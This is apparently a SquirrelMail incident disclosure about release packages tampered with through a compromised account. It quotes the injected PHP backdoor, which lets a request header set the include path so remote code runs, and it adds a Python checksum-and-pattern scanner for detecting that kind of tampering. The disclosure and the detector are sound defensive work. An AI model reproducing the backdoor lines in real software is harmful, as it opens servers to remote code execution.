Shortly after we released 1.4.12, somebody reported that the package didn’t match our checksum for it. This is not a good sign, so we set out to find out what might have happened. It turns out that one of the package managers had their account compromised, and the files released in 1.4.11, and 1.4.12, were modified after they were released.
The file change was quite tiny: 3 additional lines of code (and one more for a comment):
/** set the value of the base path */
if (isset($_SERVER['HTTP_BASE_PATH'])) {
define('SM_PATH',$_SERVER['HTTP_BASE_PATH']);
}
At first glance the change looked harmless, because HTTP_BASE_PATH is not a variable SquirrelMail defines anywhere. That is exactly the problem. Entries in $_SERVER named HTTP_* are filled in by the web server from the headers of the incoming request, which means a remote user can set one simply by adding a header to their HTTP request, and PHP will pick the value up as SM_PATH. This is a bad thing, because the next page SquirrelMail loads is located via SM_PATH, so that page would really be loaded from the remote host. This allows the attacker to execute malicious PHP code, as the webserver user, on the victim's host, without any interaction with the victim at all.
Because of this, instead of redeploying the packages (which we initially did), we decided to pull both 1.4.11 and 1.4.12 from the site and deploy 1.4.13.
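As an added example (not code from the SquirrelMail project or this post), here are the two checks a downstream packager or admin can run to catch exactly this kind of tampering: comparing an archive against its published checksum, and scanning PHP sources for request-header values ($_SERVER['HTTP_*']) flowing into define() or an include. The hash algorithm and the sample PHP are assumptions constructed for the example.

```python
"""Release-integrity checks: checksum comparison plus a scan for request-header
values used as paths. Example code added here; not SquirrelMail's own."""
import hashlib
import hmac
import re

# $_SERVER['HTTP_X'] is populated by the web server from the request header "X",
# so anything read from it is attacker-controlled. Flag it when it reaches a
# define() or an include/require on the same statement.
HEADER_VAR = r"\$_SERVER\s*\[\s*['\"]HTTP_[A-Z0-9_]+['\"]\s*\]"
SINKS = r"(?:define|include|include_once|require|require_once)"
PATTERN = re.compile(rf"\b{SINKS}\b[^;\n]*{HEADER_VAR}")


def checksum_matches(data: bytes, expected_hex: str, algo: str = "sha256") -> bool:
    """Hash the archive bytes and compare (constant-time) to the published digest.
    The algorithm is an assumption; use whatever the project publishes."""
    digest = hashlib.new(algo, data).hexdigest()
    return hmac.compare_digest(digest.lower(), expected_hex.strip().lower())


def suspicious_lines(php_source: str) -> list[tuple[int, str]]:
    """Return (line_no, line) for each line where a request header feeds a path sink."""
    return [(n, line.strip())
            for n, line in enumerate(php_source.splitlines(), 1)
            if PATTERN.search(line)]


# Constructed sample: a benign define followed by the injected lines quoted above.
SAMPLE_PHP = """<?php
define('SM_PATH', '../');
/** set the value of the base path */
if (isset($_SERVER['HTTP_BASE_PATH'])) {
define('SM_PATH',$_SERVER['HTTP_BASE_PATH']);
}
"""

if __name__ == "__main__":
    for n, line in suspicious_lines(SAMPLE_PHP):
        print(f"line {n}: {line}")
```

The isset() test on its own is not flagged; only the line where the header value becomes SM_PATH is.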